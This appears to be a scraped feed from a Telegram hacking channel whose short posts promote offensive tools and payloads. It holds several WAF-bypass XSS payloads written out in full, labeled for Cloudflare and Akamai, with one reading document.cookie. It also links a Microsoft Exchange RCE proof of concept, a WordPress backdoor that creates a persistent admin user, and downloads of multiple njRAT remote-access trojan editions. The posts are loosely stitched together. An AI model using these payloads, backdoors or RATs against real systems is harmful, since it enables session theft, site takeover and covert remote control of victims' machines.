Shuck: a tool for cracking hashes using the HIBP database
Shuck.sh
#hash
——————
0Day.Today
@LearnExploit
@Tech_Army
Advanced XSS Detection Suite
XSStrike is a Cross Site Scripting detection suite equipped with four hand-written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.
Instead of injecting payloads and checking whether they work like all the other tools do, XSStrike analyses the response with multiple parsers and then crafts payloads that are guaranteed to work by context analysis integrated with a fuzzing engine. Here are some examples of the payloads generated by XSStrike:
}]};(confirm)()//\
<A%0aONMouseOvER%0d=%0d[8].find(confirm)>z
</tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z
</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//
Apart from that, XSStrike has crawling, fuzzing, parameter discovery and WAF detection capabilities as well. It also scans for DOM XSS vulnerabilities.
Main Features
bugcod3
#XSS #Scanner #Exploit #Python
——————
Xss Bypass Waf
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//
#bypass #waf
——————
HTTP Parameter Discovery Suite
Arjun can find query parameters for URL endpoints. If you don't get what that means, it's okay, read along.
Web applications use parameters (or queries) to accept user input. Take the following example into consideration:
http://api.example.com/v1/userinfo?id=751634589
This URL seems to load user information for a specific user id, but what if there exists a parameter named admin which, when set to True, makes the endpoint provide more information about the user?
This is what Arjun does: it finds valid HTTP parameters with a huge default dictionary of 25,890 parameter names.
The best part? It takes less than 10 seconds to go through this huge list while making just 50-60 requests to the target. Here's how
GET/POST/POST-JSON/POST-XML requests
You can install arjun with pip as follows:
pip3 install arjun
or, by downloading this repository and running
python3 setup.py install
BugCod3
#Recon #Api #Testing #Fuzzer #Fuzzing
——————
Forwarded from hr
CVE-2023-36745: Microsoft Exchange Server RCE
read
Poc
#cve #rce
Daily CyberSecurity
Microsoft Exchange Server RCE (CVE-2023-36745) Flaw Gets PoC Exploit
Proof-of-concept (PoC) exploit code has been published for a Microsoft Exchange Server vulnerability tracked as CVE-2023-36745
——————
CloudFlare WAF bypass payload
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;
#WAF #bypass
——————
An Akamai WAF bypass payload
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22
#Waf #bypass
——————
Reverse Engineering and exploit development
Download
#Download
——————
Backdoor that creates an admin user with persistent access
Link File
#backdoor #wordpress
imem!
——————
Akamai Kona WAF
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
#XSS #Bypass
——————
vless://733297c1-5be1-4595-92c3-d49f8e69a867@s.thisisforu.sbs:43978?alpn=#GR_SV5_MCI_MTN-Telegram%20channel%20%253A%20%2540LearnExploit
Go ahead and enjoy it 🔥
I put 20 GB on it; when it runs out I'll send you another one
——————
telegram phone number checker - This script lets you check whether a specific phone number is connected to a Telegram account.
Github
#Telegram
GitHub
GitHub - bellingcat/telegram-phone-number-checker: Check if phone numbers are connected to Telegram accounts.
——————
🌟 njRAT 🌟
📝
NjRAT is a Remote Administration Tool. This repository contains njRAT editions.
Use it on a virtual machine
⬇️ Download (NjRat 0.7D Danger Edition)
⬇️ Download (NjRat 0.7D Golden Edition)
⬇️ Download (NjRat 0.7D Green Edition)
⬇️ Download (NjRat 0.7D)
⬇️ Download (njRAT Lime Edition )
⬇️ Download (ALL Version)
🐈⬛ Github
BugCod3
#njRAT #Tools
➖➖➖➖➖➖➖➖➖➖
An Akamai WAF bypass payload
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
#WAF #Bypass
——————
A payload to bypass WAF
<detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//
#WAF #Bypass
——————